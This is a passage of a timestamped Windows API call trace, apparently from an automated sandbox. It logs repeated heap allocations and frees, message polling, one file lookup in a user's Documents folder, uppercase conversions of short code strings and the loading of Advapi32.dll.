lpMsg=0x8bf710) returned 0 [0261.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0261.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0261.012] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0261.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0261.012] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/B1NB4QkFt.rtf", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12b4b470, ftCreationTime.dwHighDateTime=0x1d4ce38, ftLastAccessTime.dwLowDateTime=0x4276a270, ftLastAccessTime.dwHighDateTime=0x1d4d04c, ftLastWriteTime.dwLowDateTime=0x4276a270, ftLastWriteTime.dwHighDateTime=0x1d4d04c, nFileSizeHigh=0x0, nFileSizeLow=0xd827, dwReserved0=0xb690047, dwReserved1=0x2256c, cFileName="B1NB4QkFt.rtf", cAlternateFileName="B1NB4Q~1.RTF")) returned 0xaa58a0 [0261.012] FindClose (in: hFindFile=0xaa58a0 | out: hFindFile=0xaa58a0) returned 1 [0261.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0261.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0261.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0261.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0261.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0261.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0261.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0261.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0261.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0261.012] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0261.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0261.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0261.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0261.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0261.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0261.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0261.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0261.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0261.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0261.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0261.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0261.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0261.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0261.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0261.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0261.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0261.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0261.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0261.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0261.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0261.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0261.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0261.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0261.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0261.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0261.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0261.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0261.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0261.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0261.014] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0261.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0261.015] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0261.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0261.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0261.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24acc60 [0261.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0261.015] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0261.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0261.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0261.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0261.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0261.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0261.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0261.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0261.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0261.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0261.016] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0261.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0261.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0261.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0261.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0261.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0261.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0261.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0261.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0261.016] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0261.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0261.016] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0261.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0261.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0261.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0261.017] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0261.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0261.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0261.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa878 [0261.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0261.017] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0261.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0261.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0261.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0261.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0261.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0261.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0261.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0261.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0261.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0261.018] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0261.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0261.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0261.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0261.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0261.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0261.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0261.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0261.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0261.019] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0261.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0261.019] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0261.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0261.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0261.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0261.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0261.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0261.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0261.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0261.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0261.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0261.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0261.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0261.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0261.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0261.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0261.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0261.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0261.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0261.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0261.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0261.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0261.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0261.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0261.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0261.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0261.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0261.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0261.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0261.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0261.021] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0261.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0261.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0261.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0261.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0261.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0261.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0261.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0261.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0261.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0261.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0261.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0261.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0261.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0261.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0261.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0261.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0261.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0261.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0261.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0261.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0261.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0261.023] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0261.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0261.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0261.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0261.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0261.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0261.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0261.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0261.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0261.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0261.024] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0261.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0261.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0261.024] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0261.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0261.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0261.024] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0261.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0261.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0261.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0261.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b18e8 [0261.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0261.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0261.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0261.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0261.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9288 [0261.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0261.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0261.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0261.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0261.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0261.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0261.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0261.025] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0261.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0261.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0261.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0261.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0261.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0261.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0261.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0261.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0261.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0261.026] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0261.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0261.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0261.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0261.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0261.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0261.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0261.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0261.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0261.027] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0261.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0261.027] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0261.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0261.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0261.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0261.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0261.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0261.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0261.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0261.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0261.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0261.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0261.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0261.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0261.028] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 